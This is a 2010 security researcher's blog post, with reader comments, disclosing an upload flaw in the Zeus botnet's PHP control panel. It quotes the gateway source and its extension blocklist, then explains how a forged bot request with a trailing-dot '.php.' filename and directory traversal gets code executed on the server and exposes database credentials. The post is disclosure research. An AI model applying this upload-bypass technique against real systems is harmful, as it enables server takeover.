Monday, September 27th, 2010

Turning the Tables – Part I

Boom… I’ve just taken over a Zeus C&C.  I fire up a second, clean VM just to verify… yup it works.  Ok, now what?

A while back, I came across a kit for setting up a Zeus botnet.  It was an interesting package.  Looking at the C&C, bot builder, the actual bot, and user manual was pretty cool (yes, it comes with a user manual).  You have to admire the some of the tricks used by the bot, these guys are clever.  I set up a mini-botnet on a testing network and began to examine how the botnet worked.  Eventually, I came across some bugs (even a blind squirrel finds a nut every once in a while).  There are some fascinating things to consider when finding bugs in software that is used primarily by criminals, but I won’t bore you with that now.  Instead I’d like to share with you some of the more interesting parts of my research.

Before I proceed, there are a few things I’d like to state:

  1. This research was done on my own time on my own equipment.  The thoughts on my blog are my own.
  2. Disclosure of this issue is a bit tricky.  I’ll cover some of the issues I came across in a future post.
  3. I’m releasing the details of my work because I felt it was important for the public to have this knowledge to better defend their networks.
  4. All the work presented here is for academic and research purposes only.

In the spirit of responsible disclosure I contacted and informed them that I may have discovered a security issue with their C&C server software.  The team informed me that they were a cloud service provider and didn’t have C&C software. then proceeded to spam me with advertisements for their latest products.  I then contacted but received no response. then proceeded to spam me with Viagra ads and executables for me to download.  With no other alternative and an email inbox full of spam, I have no choice but to provide full disclosure of the vulnerability to the public.

Taking a look at the documentation that accompanies the Zeus package, I see change log indicates that I’m working with a recent version of Zeus (likely released earlier this year).

Examining the source code from the C&C confirms that I’m working with version, which was released on January 15th of this year.

I haven’t tested this exploit against newer versions of the C&C, but this post should provide everything you need to check yourself.  If you do happen to have a newer version of the C&C code (or kits from other botnets), please contact me (xssniper  -at- gmail) I’d love to have a look.  I looked on the Internetz to see if someone else had discovered this, but I found nothing.  If this bug was previously disclosed and I failed to credit you, please let me know (I don’t follow the bot scene very closely).

The C&C software has a PHP based web application that provides a control panel for botmasters and also serves as a gateway for bot communication.  There are several websites that have described the C&C so I won’t spend much time on that here, but I do feel it’s important to touch on a few things.  When the C&C web application is installed, very little attack surface is exposed to unauthenticated users.  The two most interesting pages available to unauthenticated users are the login page and the gateway.  By default, the login page is located at /cp.php.  By default, the gateway is located at /gate.php.  Some botmasters rename the gate.php file, however if you’ve managed to capture a live Zeus bot it will phone home to a php file.  The php file that the bot phones home to is the gateway (gate.php).  For clarity, let’s assume the gateway is at /gate.php (the default).  The gateway will only respond to requests from bots.  For example, if you point your browser to /gate.php, you’ll get a blank page back:

Luckily, we have both bot samples and the source for the C&C, allowing us to reverse the protocol needed for communication to the gateway.  Let’s walk through a couple key pieces of the gate.php source.  First, the gateway requires a POST request.

if(@$_SERVER[‘REQUEST_METHOD’] !== ‘POST’)die();



If the gateway receives a POST request, it grabs the POST body, performs some basic validation, and then decrypts the data using the RC4 algorithm.

$data      = @file_get_contents(‘php://input’);

$data_size = @strlen($data);

if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();

$data = RC4($data, BOTNET_CRYPTKEY);

This is not a typical POST request with POST parameters in the body.  Instead, this POST request contains a binary blob as its POST body (there are no POST parameter names).  The last line in the code snippet provided above mentions RC4 and a PHP constant named BOTNET_CRYPTKEY.  In case you’re wondering, the RC4 key (BOTNET_CRYPTKEY) is set by the botmaster when setting up the C&C and is stored server side (in the /system/config.php file).  As RC4 is a symmetric algorithm, the bot must also have a representation of the key.  The key is embedded into the bot (supplied via configuration file).  So once you have captured a live bot, you’ll be able to extract the RC4 key.  The key can be extracted from memory or if you are able to decrypt the config.bin file, you’ll see the key passed as part of the configuration for the bot.  If you’re interested in doing this, check out  Worst case, you can try brute forcing the key.

Once the data is decrypted, the gateway does a quick sanity check.

if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();

and proceeds to unpack the data if the sanity check turns out ok

$list = array();

for($i = HEADER_SIZE; $i < $data_size;)


$k = @unpack(‘L4′, @substr($data, $i, ITEM_HEADER_SIZE));

$list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);

$i += (ITEM_HEADER_SIZE + $k[3]);



Once the data is unpacked, we will have an array ($list[]) populated with various configuration and log data being passed from the bot to the C&C.  Using what we’ve discovered thus far, we can create a fake bot that is capable of communicating with the C&C.  Depending on the values held in the $list array, the gateway executes various functions.  One of the functions I found interesting was this:

else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))


$type = ToInt($list[SBCID_BOTLOG_TYPE]);

if($type == BLT_FILE)


//Расширения, которые представляют возможность удаленного запуска.

$bad_exts = array(‘.php3′, ‘.php4′, ‘.php5′, ‘.php’, ‘.asp’, ‘.aspx’, ‘.exe’, ‘.pl’, ‘.cgi’, ‘.cmd’, ‘.bat’, ‘.phtml’);

$fd_hash  = 0;

$fd_size  = strlen($list[SBCID_BOTLOG]);

//Формируем имя файла.

if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

$file_root = REPORTS_PATH.’/files/’.urlencode($botnet).’/’.urlencode($bot_id);

$file_path = $file_root;

$last_name = ”;

$l = explode(‘/’, (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace(‘\\’, ‘/’, $list[SBCID_PATH_DEST]) : ‘unknown’));

foreach($l as &$k)



$file_path .= ‘/’.($last_name = urlencode($k));


if(strlen($last_name) === 0)$file_path .= ‘/unknown.dat';


//Проверяем расширении, и указываем маску файла.

if(($ext = strrchr($last_name, ‘.’)) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= ‘.dat';

$ext_pos = strrpos($file_path, ‘.’);

//FIXME: Если имя слишком большое.

if(strlen($file_path) > 180)$file_path = $file_root.’/longname.dat';

//Добавляем файл.

for($i = 0; $i < 9999; $i++)


if($i == 0)$f = $file_path;

else $f = substr_replace($file_path, ‘(‘.$i.’).’, $ext_pos, 1);



if($fd_size == filesize($f))


if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);

if(strcmp(md5_file($f, true), $fd_hash) === 0)break;





if(!CreateDir(dirname($file_path)) || !($h = fopen($f, ‘wb’)))die();

flock($h, LOCK_EX);

fwrite($h, $list[SBCID_BOTLOG]);

flock($h, LOCK_UN);






A quick look at the function above shows that if $list[SBCID_BOTLOG] and $list[SBCID_BOTLOG_TYPE] are set to the correct values, we can trick the C&C into thinking we have a bot that needs to upload a logfile.  Before the C&C accepts our supplied logfile, it first attempts some validation by checking to see if the file extension we’re providing is in a blacklist of “bad extensions” and whether the filepath supplied is “IsHackNameForPath” (a custom validation routine written by the C&C author).

$bad_exts = array(‘.php3′, ‘.php4′, ‘.php5′, ‘.php’, ‘.asp’, ‘.aspx’, ‘.exe’, ‘.pl’, ‘.cgi’, ‘.cmd’, ‘.bat’, ‘.phtml’);


if(($ext = strrchr($last_name, ‘.’)) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= ‘.dat';


//Формируем имя файла.
if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

We know the web server supports PHP because the C&C web management console is written in PHP.  If we can pretend like we’re a bot, convince the C&C that we have a “BOTLOG” that needs to be uploaded, and instead of uploading a “BOTLOG” we upload a PHP file with our PHP content, we could have arbitrary code execution on the C&C.  It seems the C&C code protects against this attack… or does it?  Unfortunately for the botmaster, the PHP interpreter is very liberal on extensions.  Some examples of the quirky extension madness associated with PHP can be found on slide 23 in this presentation (given by Kuza55 at CCC 2007).  In this case, I want to upload a PHP file to both IIS and Apache (the supported platforms for the C&C) so I use the trailing dot trick.  All I have to do is append a trailing period to the end of the .php extension (.php.), and I can bypass the extension check yet have the file contents run by the PHP interpreter.  Once the extension check is bypassed, the value I supplied for $list[SBCID_BOTLOG] is written as content to the file I specified on the webserver.  Now I just have to guess where my PHP file was written.  This line of PHP in the gateway source gives us a clue.

$file_root = REPORTS_PATH.’/files/’.urlencode($botnet).’/’.urlencode($bot_id);

The default location for the BOT LOG is: C&C-webroot\_reports\files\<Name of the botnet>\<Bot ID>\

I also control (via values passed from my fake bot to the C&C) the two subdirectory names (in this example: “BKs_BOTNET” for <Name of the botnet> and “BK_PWNZ_UR_CnC” for <Bot ID>).  If the botmaster is using a default install and hasn’t relocated the _reports folder, we should be able to simply guess where our PHP file was written to (/_reports/files/BKs_BOTNET/BK_PWNZ_UR_CnC/pwnd.php).

If the botmaster was smart and relocated the _reports folder, guessing where the uploaded PHP file becomes more difficult.  We can take all the guesswork out by using some directory traversal tricks and planting the PHP file directly into the webroot.

Boom… we’ve just taken over a Zeus C&C.  Once we have our own PHP code running on the C&C, we can include the /system/config.php file.  Config.php contains the location of the MySQL database as well as the DB username and password (via connection string), giving us complete control over the management console and all the bots associated with this C&C.

For those interested in “studying” this vulnerability, I’ve put together a Proof of Concept.  All you have to do is provide the location of the gateway (provided by the bot), the RC4 key (provided by the bot), and the PHP code that you want to upload.

Posted by xssniper | Filed in Security, Tools

34 Responses to “Turning the Tables – Part I”

  1. September 27th, 2010 at 10:06 am

    pgl said:

    Interesting – looking forward to part 2!

  2. September 27th, 2010 at 12:20 pm

    myownremote said:

    yes! =) great work

  3. September 27th, 2010 at 2:08 pm

    Frank said:

    Great stuff!

    Available in Metasploit?

  4. September 27th, 2010 at 3:04 pm

    noncompoop said:


  5. September 27th, 2010 at 3:17 pm

    jbmoore said:

    Well, you’ve called this section Part I. I’m guessing Part Deux will be even more interesting. Have you talked to Brian Krebs about this little trick? He might be a useful resource. I can think of some others that could be helpful. Good work. I hate to see it get patched quickly by the bad guys. But since you’ve published it, it’s likely already been patched before you went public.

  6. September 27th, 2010 at 4:08 pm

    jbmoore said:

    Well, according to The Register it’s not easily patched. I guess we’ll see if your estimate holds. There is a great incentive though, for the authors to fix this oversight quickly.

  7. September 27th, 2010 at 7:56 pm

    Juan said:

    Nice blog!!! i liked this article. If i get some free time i’ll try your proof of concept, it seems interesting. Thanks!!!

  8. September 27th, 2010 at 8:17 pm

    Matt said:

    I just got home 2 people linked me here on msn. Amazing research, I already dowloaded the slides of the presentation you mentioned, turns out there are a few things I did not know.

  9. September 27th, 2010 at 9:32 pm

    Tone said:

    very nice

  10. September 28th, 2010 at 6:01 am

    Daniel Molina said:

    Thanks for your nice work. Try to install some syntax highlighter for your code examples, like Google Syntax Highlighter, it will bring you a very good looking on your blog. I was copy/pasting code examples on my editor to take a clear look.

  11. September 28th, 2010 at 7:34 am

    Vlado said:

    Hello, thank you for this posts. We continue to refine and update ZeuS and fixing holes like these helps with better code and most quality is more buyers :)

    I also thank your ethic and not exploit my C&C. There is much western money to be made! :) :) :)

  12. September 28th, 2010 at 7:35 am

    The Italian Honey Project » Zeus ( botnets infiltration exploit said:

    […] The full blog post here. […]

  13. September 28th, 2010 at 9:18 am

    cyberbofh said:


    Waiting for part 2 :)

  14. September 28th, 2010 at 9:28 am

    SomeOnE said:

    nice reading, thx bill. somehow unnatural russian in comments, with a slightest error a russian will never make (-;


  15. September 28th, 2010 at 11:54 am

    Grab bag: Hacking and hacks (Jarrett House North) said:

    […] Billy (BK) Rios » Turning the Tables – Part I On how to exploit a weakness in the Zeus botnet command and control software and pwn it. (tags: security) […]

  16. September 28th, 2010 at 3:32 pm

    Vinicius K-Max said:

    Very nice post!
    Can’t wait for part 2.

  17. September 28th, 2010 at 7:09 pm

    OneSome said:

    “//Проверяем расширении, и указываем маску файла.”

    Yeah this one is both unnatural and has a couple of grammar issues.

    //FIXME: Если имя слишком большое.

    this one uses a wrong adjective ~ “big file name” instead of “long file name”

    So do you think Zeus is just a plot by the US govt to push the cyberwar thing through? :)

  18. September 30th, 2010 at 1:32 am

    Tom said:

    Great stuff :-)

  19. September 30th, 2010 at 4:17 pm

    YOU F'N MORON said:

    You NEVER should have “publically” disclosed this vulnerability. There is a reason things of this nature SHOULD have been kept quite.

    I know what you’re thinking in helping the security community, but…

  20. October 1st, 2010 at 1:11 am

    MaXe said:

    Very nice research, I liked it quite a lot! The detail of information is also very nice. I look forward to read more about your findings 😉

  21. October 1st, 2010 at 11:17 am

    test said:

    yes ,exploit ok with php admin but not easy for get RC4 key if have good trick

    thanks research

  22. October 1st, 2010 at 3:30 pm

    Dodge said:

    I suppose your a pissed off ex (if i’m right) MS employee otherwise you would not have posted this info. By explaining how you achieved your result, you’ve given the bot writers the ammo they need to put a patch in place, while on the other hand giving the authourites the info they need to take the bot’s down. You obviously want to see both sides going at it. There’s more to you than meets the eye and it does not look pretty.

  23. October 3rd, 2010 at 10:18 pm

    Week 39 in Review – 2010 | Infosec Events said:

    […] Turning the Tables – Part I – Boom… I’ve just taken over a Zeus C&C.  I fire up a second, clean VM just to verify… yup it works. […]

  24. October 4th, 2010 at 2:35 am

    NetC said:

    Nice work.
    Know some security company’s witch have known this for a long time. But they just steal the information form the Zeus server and sell it of to banks.

    Ho is now the criminal ? The security firm or the Zeus bot-master ?


  25. October 4th, 2010 at 9:49 pm

    Sri said:

    Billy, Awesome research – keep up the good work

  26. November 2nd, 2010 at 12:59 am

    Joe said:

    The extension “hole” has nothing to do with PHP. It is the web server configuration that determines whether to pass a request off to PHP or not. PHP has no concept of file extensions at all. If the web server says, “treat this file as a PHP script” then PHP will interpret it.

  27. December 13th, 2010 at 4:43 am

    Risky Business #170 — The week of Zeus! - 華人資安廣播 Information Security Voice Of Chinese said:

    […] in Japan. He’s grumpy! He’s not pleased! A security researcher in the USA published a nice big detailed blog post the other day in which he described some vulnerabilities he’d found in the Zeus botnet CC […]

  28. December 18th, 2010 at 7:10 pm

    Ben said:

    Really Interested in your work + you’ve got a good skill. Keep up the brilliant work + research mate!

  29. January 2nd, 2011 at 7:00 pm

    Dave51 said:

    Thoughts on Security in an Uncivilized World…Boom… I

  30. April 27th, 2012 at 7:53 am

    Bypass zeus panel ? said:

    […]…r-1097298.html…ng-the-tables/ http://ddanchev.Research…erable-to.html […]

  31. May 6th, 2014 at 11:52 am

    ste williams – Watch a bank-raiding ZeuS bot command post get owned in 60 seconds said:

    […] bots and their command server, and the URL to the server, and exploited a bug (that appears to be similar to this one) to own the control […]

  32. May 6th, 2014 at 9:16 pm

    ZeuS Bot Command Post Gets Owned In 60 Seconds | Cyber security labs by Cipher Net AB said:

    […] bots and their command server, and the URL to the server, and exploited a bug (that appears to be similar to this one) to own the control […]

  33. August 11th, 2014 at 10:40 am

    How to bypass Zeus Trojan’s self protection mechanism | said:

    […] in some versions of Zeus ( as well as Zeus lite, KINS,ICE-IX) As described in detail here ( . Our good friend Xylitol has already provided a ready to use tool to exploit such vulnerability […]

  34. April 7th, 2015 at 7:37 am

    embossitworld said:

    friend Xylitol has already provided a ready to use tool to exploit such vulnerabilit

Please leave a Comment